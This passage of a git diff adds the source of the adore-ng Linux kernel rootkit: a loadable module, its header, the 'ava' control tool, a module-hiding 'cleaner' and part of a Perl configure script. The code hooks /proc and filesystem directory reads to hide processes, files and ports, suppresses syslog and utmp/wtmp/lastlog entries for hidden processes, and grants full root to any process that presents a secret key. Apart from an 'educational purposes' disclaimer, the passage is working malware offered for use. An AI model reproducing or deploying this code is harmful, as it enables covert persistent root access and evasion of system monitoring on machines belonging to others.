+        if (t_afinfo) {
+                orig_tcp4_seq_show = t_afinfo->seq_show;
+                t_afinfo->seq_show = adore_tcp4_seq_show;
+        }
+
+        orig_proc_lookup = proc_root.proc_iops->lookup;
+        proc_root.proc_iops->lookup = adore_lookup;
+
+        patch_vfs(proc_fs, &orig_proc_readdir, adore_proc_readdir);
+        patch_vfs(root_fs, &orig_root_readdir, adore_root_readdir);
+        if (opt_fs)
+                patch_vfs(opt_fs, &orig_opt_readdir,
+                          adore_opt_readdir);
+
+        patch_syslog();
+
+        j = 0;
+        for (i = 0; var_filenames[i]; ++i) {
+                var_files[i] = filp_open(var_filenames[i], O_RDONLY, 0);
+                if (IS_ERR(var_files[i])) {
+                        var_files[i] = NULL;
+                        continue;
+                }
+                if (!j) {       /* just replace one time, its all the same FS */
+                        orig_var_write = var_files[i]->f_op->write;
+                        var_files[i]->f_op->write = adore_var_write;
+                        j = 1;
+                }
+        }
+
+        return 0;
+}
+
+
+static void __exit adore_cleanup()
+{
+        struct proc_dir_entry *pde = NULL;
+        struct tcp_seq_afinfo *t_afinfo = NULL;
+        int i = 0, j = 0;
+        static int cleaned = 0;
+
+        if (cleaned)
+                return;
+
+        pde = proc_find_tcp();
+        t_afinfo = (struct tcp_seq_afinfo*)pde->data;
+        if (t_afinfo && orig_tcp4_seq_show)
+                t_afinfo->seq_show = orig_tcp4_seq_show;
+
+        proc_root.proc_iops->lookup = orig_proc_lookup;
+
+        unpatch_vfs(proc_fs, orig_proc_readdir);
+        unpatch_vfs(root_fs, orig_root_readdir);
+
+        if (orig_opt_readdir)
+                unpatch_vfs(opt_fs, orig_opt_readdir);
+
+        /* In case where syslogd wasnt found in init_module() */
+        if (unix_dgram_ops && orig_unix_dgram_recvmsg)
+                unix_dgram_ops->recvmsg = orig_unix_dgram_recvmsg;
+
+        j = 0;
+        for (i = 0; var_filenames[i]; ++i) {
+                if (var_files[i]) {
+                        if (!j) {
+                                var_files[i]->f_op->write = orig_var_write;
+                                j = 1;
+                        }
+                        filp_close(var_files[i], 0);
+                }
+        }
+
+        cleaned = 1;
+}
+
+module_init(adore_init);
+module_exit(adore_cleanup);
+
+MODULE_LICENSE("GPL");
+
diff --git a/other/adore-ng/adore-ng.c b/other/adore-ng/adore-ng.c
new file mode 100644
index 0000000..3194299
--- /dev/null
+++ b/other/adore-ng/adore-ng.c
@@ -0,0 +1,665 @@
+/*** (C) 2004 by Stealth
+ ***
+ *** http://spider.scorpions.net/~stealth
+ *** http://stealth.7350.org/rootkits
+ ***    
+ ***
+ *** (C)'ed Under a BSDish license. Please look at LICENSE-file.
+ *** SO YOU USE THIS AT YOUR OWN RISK!
+ *** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS. 
+ *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
+ ***
+ ***    -> Use ava to get all the things workin'.
+ ***
+ ***/
+#define __KERNEL__
+#define MODULE
+
+
+#ifdef MODVERSIONS
+#include <linux/modversions.h>
+#endif
+
+#include <linux/sched.h>
+#include <linux/kernel.h>
+#include <linux/module.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/file.h>
+#include <linux/mount.h>
+#include <linux/proc_fs.h>
+#include <linux/capability.h>
+#include <linux/net.h>
+#include <linux/skbuff.h>
+#include <linux/spinlock.h>
+#include <net/sock.h>
+#include <linux/un.h>
+#include <net/af_unix.h>
+
+#include "adore-ng.h"
+
+
+char *proc_fs = "/proc";        /* default proc FS to hide processes */
+MODULE_PARM(proc_fs, "s");
+char *root_fs = "/";            /* default FS to hide files */
+
+MODULE_PARM(root_fs, "s");
+char *opt_fs = NULL;
+MODULE_PARM(opt_fs, "s");
+
+
+typedef int (*readdir_t)(struct file *, void *, filldir_t);
+readdir_t orig_root_readdir = NULL, orig_opt_readdir = NULL,
+          orig_proc_readdir = NULL;
+
+struct dentry *(*orig_proc_lookup)(struct inode *, struct dentry *) = NULL;
+
+
+int cleanup_module();
+
+static int tcp_new_size();
+static int (*o_get_info_tcp)(char *, char **, off_t, int);
+
+extern struct socket *sockfd_lookup(int fd, int *err);
+extern __inline__ void sockfd_put(struct socket *sock)
+{
+        fput(sock->file);
+}
+
+#ifndef PID_MAX
+#define PID_MAX 0x8000
+#endif
+
+static char hidden_procs[PID_MAX/8+1];
+
+inline void hide_proc(pid_t x)
+{
+        if (x >= PID_MAX || x == 1)
+                return;
+        hidden_procs[x/8] |= 1<<(x%8);
+}
+
+inline void unhide_proc(pid_t x)
+{
+        if (x >= PID_MAX)
+                return;
+        hidden_procs[x/8] &= ~(1<<(x%8));
+}
+
+inline char is_invisible(pid_t x)
+{
+        if (x >= PID_MAX)
+                return 0;
+        return hidden_procs[x/8]&(1<<(x%8));
+}
+
+/* Theres some crap after the PID-filename on proc
+ * getdents() so the semantics of this function changed:
+ * Make "672" -> 672 and
+ * "672|@\"   -> 672 too
+ */
+int adore_atoi(const char *str)
+{
+        int ret = 0, mul = 1;
+        const char *ptr;
+   
+        for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++) 
+                ;
+        ptr--;
+        while (ptr >= str) {
+                if (*ptr < '0' || *ptr > '9')
+                        break;
+                ret += (*ptr - '0') * mul;
+                mul *= 10;
+                ptr--;
+        }
+        return ret;
+}
+
+/* Own implementation of find_task_by_pid() */
+struct task_struct *adore_find_task(pid_t pid)
+{
+        struct task_struct *p;
+
+        read_lock(&tasklist_lock);      // XXX: locking necessary?
+        for_each_task(p) {
+                if (p->pid == pid) {
+                        read_unlock(&tasklist_lock);
+                        return p;
+                }
+        }
+        read_unlock(&tasklist_lock);
+        return NULL;
+}
+
+int should_be_hidden(pid_t pid)
+{
+        struct task_struct *p = NULL;
+
+        if (is_invisible(pid)) {
+                return 1;
+        }
+
+        p = adore_find_task(pid);
+        if (!p)
+                return 0;
+
+        /* If the parent is hidden, we are hidden too XXX */
+        task_lock(p);
+
+        if (is_invisible(p->p_pptr->pid)) {
+                task_unlock(p);
+                hide_proc(pid);
+                return 1;
+        }
+
+        task_unlock(p);
+        return 0;
+}
+
+/* You can control adore-ng without ava too:
+ *
+ * echo > /proc/<ADORE_KEY> will make the shell authenticated,
+ * cat /proc/hide-<PID> from such a shell will hide PID,
+ * cat /proc/unhide-<PID> will unhide the process
+ * cat /proc/uninstall will uninstall adore
+ */
+struct dentry *adore_lookup(struct inode *i, struct dentry *d)
+{
+
+        task_lock(current);
+
+        if (strncmp(ADORE_KEY, d->d_iname, strlen(ADORE_KEY)) == 0) {
+                current->flags |= PF_AUTH;
+                current->suid = ADORE_VERSION;
+        } else if ((current->flags & PF_AUTH) &&
+                   strncmp(d->d_iname, "fullprivs", 9) == 0) {
+                current->uid = 0;
+                current->suid = 0;
+                current->euid = 0;
+                current->gid = 0;
+                current->egid = 0;
+                current->fsuid = 0;
+                current->fsgid = 0;
+
+                cap_set_full(current->cap_effective);
+                cap_set_full(current->cap_inheritable);
+                cap_set_full(current->cap_permitted);
+        } else if ((current->flags & PF_AUTH) &&
+                   strncmp(d->d_iname, "hide-", 5) == 0) {
+                hide_proc(adore_atoi(d->d_iname+5));
+        } else if ((current->flags & PF_AUTH) &&
+                   strncmp(d->d_iname, "unhide-", 7) == 0) {
+                unhide_proc(adore_atoi(d->d_iname+7));
+        } else if ((current->flags & PF_AUTH) &&
+                   strncmp(d->d_iname, "uninstall", 9) == 0) {
+                        cleanup_module();
+        }
+
+        task_unlock(current);
+
+        if (should_be_hidden(adore_atoi(d->d_iname)) &&
+        /* A hidden ps must be able to see itself! */
+            !should_be_hidden(current->pid))
+                return NULL;
+
+        return orig_proc_lookup(i, d);
+}
+
+
+filldir_t proc_filldir = NULL;
+spinlock_t proc_filldir_lock = SPIN_LOCK_UNLOCKED;
+
+int adore_proc_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
+{
+        if (should_be_hidden(adore_atoi(name)))
+                return 0;
+        return proc_filldir(buf, name, nlen, off, ino, x);
+}
+
+
+
+int adore_proc_readdir(struct file *fp, void *buf, filldir_t filldir)
+{
+        int r = 0;
+
+        spin_lock(&proc_filldir_lock);
+        proc_filldir = filldir;
+        r = orig_proc_readdir(fp, buf, adore_proc_filldir);
+        spin_unlock(&proc_filldir_lock);
+        return r;
+}
+
+
+filldir_t opt_filldir = NULL;
+struct super_block *opt_sb[1024];
+
+int adore_opt_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
+{
+        struct inode *inode = NULL;
+        int r = 0;
+        uid_t uid;
+        gid_t gid;
+
+        if ((inode = iget(opt_sb[current->pid % 1024], ino)) == NULL)
+                return 0;
+        uid = inode->i_uid;
+        gid = inode->i_gid;
+        iput(inode);
+
+        /* Is it hidden ? */
+        if (uid == ELITE_UID && gid == ELITE_GID) {
+                r = 0;
+        } else
+                r = opt_filldir(buf, name, nlen, off, ino, x);
+
+        return r;
+}
+
+
+int adore_opt_readdir(struct file *fp, void *buf, filldir_t filldir)
+{
+        int r = 0;
+
+        if (!fp || !fp->f_vfsmnt)
+                return 0;
+
+        opt_filldir = filldir;
+        opt_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;
+        r = orig_opt_readdir(fp, buf, adore_opt_filldir);
+        
+        return r;
+}
+
+
+/* About the locking of these global vars:
+ * I used to lock these via rwlocks but on SMP systems this can cause
+ * a deadlock because the iget() locks an inode itself and I guess this
+ * could cause a locking situation of AB BA. So, I do not lock root_sb and
+ * root_filldir (same with opt_) anymore. root_filldir should anyway always
+ * be the same (filldir64 or filldir, depending on the libc). The worst thing that
+ * could happen is that 2 processes call filldir where the 2nd is replacing
+ * root_sb which affects the 1st process which AT WORST CASE shows the hidden files.
+ * Following conditions have to be met then: 1. SMP 2. 2 processes calling getdents()
+ * on 2 different partitions with the same FS.
+ * Now, since I made an array of super_blocks it must also be that the PIDs of
+ * these procs have to be the same PID modulo 1024. This sitation (all 3 cases must
+ * be met) should be very very rare.
+ */
+filldir_t root_filldir = NULL;
+struct super_block *root_sb[1024];
+
+
+int adore_root_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
+{
+        struct inode *inode = NULL;
+        int r = 0;
+        uid_t uid;
+        gid_t gid;
+
+        if ((inode = iget(root_sb[current->pid % 1024], ino)) == NULL)
+                return 0;
+        uid = inode->i_uid;
+        gid = inode->i_gid;
+        iput(inode);
+
+        /* Is it hidden ? */
+        if (uid == ELITE_UID && gid == ELITE_GID) {
+                r = 0;
+        } else
+                r = root_filldir(buf, name, nlen, off, ino, x);
+
+        return r;
+}
+
+
+int adore_root_readdir(struct file *fp, void *buf, filldir_t filldir)
+{
+        int r = 0;
+
+        if (!fp || !fp->f_vfsmnt)
+                return 0;
+
+        root_filldir = filldir;
+        root_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;
+        r = orig_root_readdir(fp, buf, adore_root_filldir);
+        return r;
+}
+
+
+int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir)
+{
+        struct file *filep;
+        
+        if ((filep = filp_open(p, O_RDONLY, 0)) == NULL) {
+                return -1;
+        }
+
+        if (orig_readdir)
+                *orig_readdir = filep->f_op->readdir;
+
+        filep->f_op->readdir = new_readdir;
+        filp_close(filep, 0);
+        return 0;
+}
+
+
+int unpatch_vfs(const char *p, readdir_t orig_readdir)
+{
+        struct file *filep;
+        
+        if ((filep = filp_open(p, O_RDONLY, 0)) == NULL) {
+                return -1;
+        }
+
+        filep->f_op->readdir = orig_readdir;
+        filp_close(filep, 0);
+        return 0;
+}
+
+
+char *strnstr(const char *haystack, const char *needle, size_t n)
+{
+        char *s = strstr(haystack, needle);
+        if (s == NULL)
+                return NULL;
+        if (s-haystack+strlen(needle) <= n)
+                return s;
+        else
+                return NULL;
+}
+
+
+struct proc_dir_entry *proc_find_tcp()
+{
+        struct proc_dir_entry *p = proc_net->subdir;
+
+        while (strcmp(p->name, "tcp"))
+                p = p->next;
+        return p;
+}
+
+
+/* Reading from /proc/net/tcp gives back data in chunks
+ * of NET_CHUNK. We try to match these against hidden ports
+ * and remove them respectively
+ */
+#define NET_CHUNK 150
+int n_get_info_tcp(char *page, char **start, off_t pos, int count)
+{
+        int r = 0, i = 0, n = 0, hidden = 0;
+        char port[10], *ptr = NULL, *mem = NULL, *it = NULL;
+
+        /* Admin accessing beyond sizeof patched file? */
+        if (pos >= tcp_new_size())
+                return 0;
+        
+        r = o_get_info_tcp(page, start, pos, count);
+
+        if (r <= 0)// NET_CHUNK)
+                return r;
+
+        mem = (char *)kmalloc(r+NET_CHUNK+1, GFP_KERNEL);
+        if (!mem)
+                return r;
+
+        memset(mem, 0, r+NET_CHUNK+1);
+        it = mem;
+
+        /* If pos < NET_CHUNK then theres preamble which we can skip */
+        if (pos >= NET_CHUNK) {
+                ptr = page;
+                n = (pos/NET_CHUNK) - 1;
+        } else {
+                memcpy(it, page, NET_CHUNK);
+                it += NET_CHUNK;
+                ptr = page + NET_CHUNK;
+                n = 0;
+        }
+
+        for (; ptr < page+r; ptr += NET_CHUNK) {
+                hidden = 0;
+                for (i = 0; HIDDEN_SERVICES[i]; ++i) {
+                        sprintf(port, ":%04X", HIDDEN_SERVICES[i]);
+
+                        /* Ignore hidden blocks */
+                        if (strnstr(ptr, port, NET_CHUNK))
+                                hidden = 1;
+                }
+                if (!hidden) {
+                        sprintf(port, "%4d:", n);
+                        strncpy(ptr, port, strlen(port));
+                        memcpy(it, ptr, NET_CHUNK);
+                        it += NET_CHUNK;
+                        ++n;
+                }
+        }
+
+        memcpy(page, mem, r);
+        n = strlen(mem);
+        /* If we shrinked buffer, patch length */
+        if (r > n)
+                r = n;//-(*start-page);
+        if (r < 0)
+                r = 0;
+
+//      *start = page + (*start-page);
+        *start = page;
+        kfree(mem);
+        return r;
+}
+
+
+/* Calculate size of patched /proc/net/tcp */
+int tcp_new_size()
+{
+        int r, hits = 0, i = 0, l = 10*NET_CHUNK;
+        char *page = NULL, *start, *ptr, port[10];
+
+        for (;;) {
+                page = (char*)kmalloc(l+1, GFP_KERNEL);
+                if (!page)
+                        return 0;
+                r = o_get_info_tcp(page, &start, 0, l);
+                if (r < l)
+                        break;
+                l <<= 1;
+                kfree(page);
+        }
+
+        for (ptr = start; ptr < start+r; ptr += NET_CHUNK) {
+                for (i = 0; HIDDEN_SERVICES[i]; ++i) {
+                        sprintf(port, ":%04X", HIDDEN_SERVICES[i]);
+                        if (strnstr(ptr, port, NET_CHUNK)) {
+                                ++hits;
+                                break;
+                        }
+                }
+        }
+        kfree(page);
+        return r - hits*NET_CHUNK;
+}
+
+
+static
+int (*orig_unix_dgram_recvmsg)(struct socket *, struct msghdr *, int,
+                      int, struct scm_cookie *) = NULL;
+static struct proto_ops *unix_dgram_ops = NULL;
+
+int adore_unix_dgram_recvmsg(struct socket *sock, struct msghdr *msg, int size,
+                      int flags, struct scm_cookie *scm)
+{
+        struct sock *sk = NULL;
+        int noblock = flags & MSG_DONTWAIT;
+        struct sk_buff *skb = NULL;
+        int err;
+        struct ucred *creds = NULL;
+        int not_done = 1;
+
+        if (strcmp(current->comm, "syslogd") != 0 || !msg || !sock)
+                goto out;
+
+        sk = sock->sk;
+
+        err = -EOPNOTSUPP;
+        if (flags & MSG_OOB)
+                goto out;
+
+        do {
+                msg->msg_namelen = 0;
+                skb = skb_recv_datagram(sk, flags|MSG_PEEK, noblock, &err);
+                if (!skb)
+                        goto out;
+                creds = UNIXCREDS(skb);
+                if (!creds)
+                        goto out;
+                if ((not_done = should_be_hidden(creds->pid)))
+                        skb_dequeue(&sk->receive_queue);
+        } while (not_done);
+
+out:
+        err = orig_unix_dgram_recvmsg(sock, msg, size, flags, scm);
+        return err;
+}
+
+
+static struct file *var_files[] = {
+        NULL,
+        NULL,
+        NULL,
+        NULL
+};
+
+static char *var_filenames[] = {
+        "/var/run/utmp",
+        "/var/log/wtmp",
+        "/var/log/lastlog",
+        NULL
+};
+
+static
+ssize_t (*orig_var_write)(struct file *, const char *, size_t, loff_t *) = NULL;
+
+static
+ssize_t adore_var_write(struct file *f, const char *buf, size_t blen, loff_t *off)
+{
+        int i = 0;
+
+        /* If its hidden and if it has no special privileges and
+         * if it tries to write to the /var files, fake it
+         */
+        if (should_be_hidden(current->pid) &&
+            !(current->flags & PF_AUTH)) {
+                for (i = 0; var_filenames[i]; ++i) {
+                        if (var_files[i] &&
+                            var_files[i]->f_dentry->d_inode->i_ino == f->f_dentry->d_inode->i_ino) {
+                                *off += blen;
+                                return blen;
+                        }
+                }
+        }
+        return orig_var_write(f, buf, blen, off);
+}       
+
+
+static int patch_syslog()
+{
+        struct socket *sock = NULL;
+
+        /* PF_UNIX, SOCK_DGRAM */
+        if (sock_create(1, 2, 0, &sock) < 0)
+                return -1;
+
+        if (sock && (unix_dgram_ops = sock->ops)) {
+                orig_unix_dgram_recvmsg = unix_dgram_ops->recvmsg;
+                unix_dgram_ops->recvmsg = adore_unix_dgram_recvmsg;
+                sock_release(sock);
+        }
+
+        return 0;
+}
+
+
+#ifdef RELINKED
+extern int zero_module();
+extern int zeronup_module();
+#endif
+
+int init_module()
+{
+        struct proc_dir_entry *pde = NULL;
+        int i = 0, j = 0;
+
+        EXPORT_NO_SYMBOLS;
+
+        memset(hidden_procs, 0, sizeof(hidden_procs));
+
+        pde = proc_find_tcp();
+        o_get_info_tcp = pde->get_info;
+        pde->get_info = n_get_info_tcp;
+
+        orig_proc_lookup = proc_root.proc_iops->lookup;
+        proc_root.proc_iops->lookup = adore_lookup;
+
+        patch_vfs(proc_fs, &orig_proc_readdir, adore_proc_readdir);
+        patch_vfs(root_fs, &orig_root_readdir, adore_root_readdir);
+        if (opt_fs)
+                patch_vfs(opt_fs, &orig_opt_readdir,
+                          adore_opt_readdir);
+
+        patch_syslog();
+
+        j = 0;
+        for (i = 0; var_filenames[i]; ++i) {
+                var_files[i] = filp_open(var_filenames[i], O_RDONLY, 0);
+                if (IS_ERR(var_files[i])) {
+                        var_files[i] = NULL;
+                        continue;
+                }
+                if (!j) {       /* just replace one time, its all the same FS */
+                        orig_var_write = var_files[i]->f_op->write;
+                        var_files[i]->f_op->write = adore_var_write;
+                        j = 1;
+                }
+        }
+#ifdef RELINKED
+        MOD_INC_USE_COUNT;
+        zero_module();
+#endif  
+        return 0;
+}
+
+
+int cleanup_module()
+{
+        int i = 0, j = 0;
+
+        proc_find_tcp()->get_info = o_get_info_tcp;
+        proc_root.proc_iops->lookup = orig_proc_lookup;
+
+        unpatch_vfs(proc_fs, orig_proc_readdir);
+        unpatch_vfs(root_fs, orig_root_readdir);
+
+        if (orig_opt_readdir)
+                unpatch_vfs(opt_fs, orig_opt_readdir);
+
+        /* In case where syslogd wasnt found in init_module() */
+        if (unix_dgram_ops && orig_unix_dgram_recvmsg)
+                unix_dgram_ops->recvmsg = orig_unix_dgram_recvmsg;
+
+        j = 0;
+        for (i = 0; var_filenames[i]; ++i) {
+                if (var_files[i]) {
+                        if (!j) {
+                                var_files[i]->f_op->write = orig_var_write;
+                                j = 1;
+                        }
+                        filp_close(var_files[i], 0);
+                }
+        }
+
+        return 0;
+}
+
+MODULE_LICENSE("GPL");
+
diff --git a/other/adore-ng/adore-ng.h b/other/adore-ng/adore-ng.h
new file mode 100644
index 0000000..b5e2eab
--- /dev/null
+++ b/other/adore-ng/adore-ng.h
@@ -0,0 +1,55 @@
+/*** (C) 2003 by Stealth -- http://stealth.7350.org
+ ***    
+ ***
+ *** (C)'ed Under a BSDish license. Please look at LICENSE-file.
+ *** SO YOU USE THIS AT YOUR OWN RISK!
+ *** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS. 
+ *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
+ ***
+ ***    -> Use ava to get all the things workin'.
+ ***
+ *** Greets fly out to all my friends. You know who you are. :)
+ *** Special thanks to Shivan for granting root access to his
+ *** SMP box for adore-development. More thx to skyper for also
+ *** granting root access.
+ ***
+ ***/
+#ifndef __ADORE_NG_H__
+#define __ADORE_NG_H__
+
+/* to check whether request is legal */
+#define PF_AUTH 0x1000000
+
+#ifndef ELITE_UID
+#error "No ELITE_UID given!"
+#endif
+
+#ifndef ELITE_GID
+#error "No ELITE_GID given!"
+#endif
+
+#ifndef ADORE_KEY
+#error "No ADORE_KEY given!"
+#endif
+
+#define ADORE_VERSION CURRENT_ADORE
+
+/* Very old kernels don't have an equivalent macro... */
+#define LinuxVersionCode(v, p, s) (((v)<<16)+((p)<<8)+(s))
+
+u_short HIDDEN_SERVICES[] = 
+        {2222, 7350, 0};
+
+/* END CHANGE SECTION */
+
+struct task_struct *adore_find_task(pid_t);
+
+int adore_atoi(const char *);
+extern struct module *module_list;
+
+#ifdef LINUX26
+#undef for_each_task
+#define for_each_task for_each_process
+#endif
+
+#endif /* __ADORE_NG_H__ */
diff --git a/other/adore-ng/adore-ng.mod.c b/other/adore-ng/adore-ng.mod.c
new file mode 100644
index 0000000..807478c
--- /dev/null
+++ b/other/adore-ng/adore-ng.mod.c
@@ -0,0 +1,17 @@
+#define MODULE
+#define __KERNEL__
+#ifdef MODVERSIONS
+#include <linux/modversions.h>
+#endif
+
+#include <linux/module.h>
+#include <linux/vermagic.h>
+#include <linux/compiler.h>
+
+MODULE_INFO(vermagic, VERMAGIC_STRING);
+
+static const char __module_depends[]
+__attribute_used__
+__attribute__((section(".modinfo"))) =
+"depends=";
+
diff --git a/other/adore-ng/ava.c b/other/adore-ng/ava.c
new file mode 100644
index 0000000..cf68e79
--- /dev/null
+++ b/other/adore-ng/ava.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 1999-2003 Stealth.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Stealth.
+ * 4. The name Stealth may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <errno.h>
+#include <sys/signal.h>
+#include <stdlib.h>
+
+#include "libinvisible.h"
+
+extern char **environ;
+
+const char *adore_key = ADORE_KEY;
+const uid_t elite_uid = ELITE_UID;
+const gid_t elite_gid = ELITE_GID;
+const int current_adore = CURRENT_ADORE;
+
+int main(int argc, char *argv[])
+{
+        int version;
+        char what;
+        adore_t *a;     
+    
+        if (argc < 3 && !(argc == 2 &&
+                         (argv[1][0] == 'U' || argv[1][0] == 'I'))) {
+                printf("Usage: %s {h,u,r,R,i,v,U} [file or PID]\n\n"
+                       "       I print info (secret UID etc)\n"
+                       "       h hide file\n"
+                       "       u unhide file\n"
+                       "       r execute as root\n"
+                       "       R remove PID forever\n"
+                       "       U uninstall adore\n"
+                       "       i make PID invisible\n"
+                       "       v make PID visible\n\n", argv[0]);
+                exit(1);
+        }
+        what = argv[1][0];
+    
+        printf("Checking for adore  0.12 or higher ...\n");
+
+        a = adore_init();
+        if (adore_makeroot(a) < 0)
+                fprintf(stderr, "Failed to run as root. Trying anyway ...\n");
+        
+        if ((version = adore_getvers(a)) <= 0 && what != 'I') {
+                printf("Adore NOT installed. Exiting.\n");
+                exit(1);
+        }
+        if (version < CURRENT_ADORE) 
+                printf("Found adore 1.%d installed. Please update adore.", version);
+        else
+                printf("Adore 1.%d installed. Good luck.\n", version);
+    
+        switch (what) {
+        
+        /* hide file */
+        case 'h':
+                if (adore_hidefile(a, argv[2]) >= 0)
+                        printf("File '%s' hided.\n", argv[2]);
+                else
+                        printf("Can't hide file.\n");
+                break;
+                        
+        /* unhide file */
+        case 'u':
+                if (adore_unhidefile(a, argv[2]) >= 0)
+                        printf("File '%s' unhided.\n", argv[2]);
+                else
+                        printf("Can't unhide file.\n");
+                break;
+        /* make pid invisible */
+        case 'i':
+                if (adore_hideproc(a, (pid_t)atoi(argv[2])) >= 0)
+                        printf("Made PID %d invisible.\n", atoi(argv[2]));
+                else
+                        printf("Can't hide process.\n");
+                break;
+        
+        /* make pid visible */
+        case 'v':
+                if (adore_unhideproc(a, (pid_t)atoi(argv[2])) >= 0)
+                        printf("Made PID %d visible.\n", atoi(argv[2]));
+                else
+                        printf("Can't unhide process.\n");
+                break;
+        /* execute command as root */
+        case 'r': 
+                execve(argv[2], argv+2, environ);
+                perror("execve");
+                break;
+        case 'R':
+                if (adore_removeproc(a, (pid_t)atoi(argv[2])) >= 0)
+                        printf("Removed PID %d from taskstruct\n", atoi(argv[2]));
+                else
+                        printf("Failed to remove proc.\n");
+                break;
+        /* uninstall adore */
+        case 'U':
+                if (adore_uninstall(a) >= 0)
+                        printf("Adore 0.%d de-installed.\n", version);
+                else
+                        printf("Adore wasn't installed.\n");
+                break;
+        case 'I':
+                printf("\nELITE_UID: %u, ELITE_GID=%u, ADORE_KEY=%s "
+                       "CURRENT_ADORE=%d\n",
+                       elite_uid, elite_gid, adore_key, current_adore);
+                break;  
+        default:
+                printf("Did nothing or failed.\n");
+        }
+        return 0;
+}
+
diff --git a/other/adore-ng/cleaner.c b/other/adore-ng/cleaner.c
new file mode 100644
index 0000000..8e7fcee
--- /dev/null
+++ b/other/adore-ng/cleaner.c
@@ -0,0 +1,58 @@
+/*
+ * Copyright (C) 2003 Stealth.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Stealth.
+ * 4. The name Stealth may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#define __KERNEL__
+#define MODULE
+
+#ifdef MODVERSIONS
+#include <linux/modversions.h>
+#endif
+
+#include <linux/kernel.h>
+#include <linux/module.h>
+#include <linux/string.h>
+
+int init_module()
+{
+        if (__this_module.next)
+                __this_module.next = __this_module.next->next;
+
+        return 0;
+}
+
+int cleanup_module()
+{
+        return 0;
+}
+
+MODULE_LICENSE("GPL");
+
diff --git a/other/adore-ng/configure b/other/adore-ng/configure
new file mode 100755
index 0000000..0edcb41
--- /dev/null
+++ b/other/adore-ng/configure
@@ -0,0 +1,243 @@
+#!/usr/bin/perl
+
+# (C) 2002 by Stealth.
+# Using at your own risk. Licensed under BSDish license.
+# See LICENSE-file. Standard disclaimer applies.
+
+# adore configuration script
+# One can also use Makefile.gen edited by hand
+# when perl is not available or one needs special values
+# (crosscompiling)
+
+#
+# Initializink, Pitr ... 
+#
+
+$elite_uid = 0;
+$elite_cmd = 0;
+$cc = "";
+$| = 1;
+$current_adore = 41;
+$bw = shift || 4;
+
+print "\nUsing byte-width of $bw for UID/GID\n";
+
+sub get_pass()
+{
+        print "\n\nSince version 0.33 Adore requires 'authentication' for\n".
+              "its services. You will be prompted for a password now and this\n".
+              "password will be compiled into 'adore' and 'ava' so no further actions\n".
+              "by you are required.\nThis procedure will save adore from scanners.\n".
+              "Try to choose a unique name that is won't clash with filenames in /proc.\n";
+
+        print "Password (echoed):"; my $s = <STDIN>;
+        chop($s);
+        s/"//g;
+        return substr($s, 0, 15);
+}
+
+#
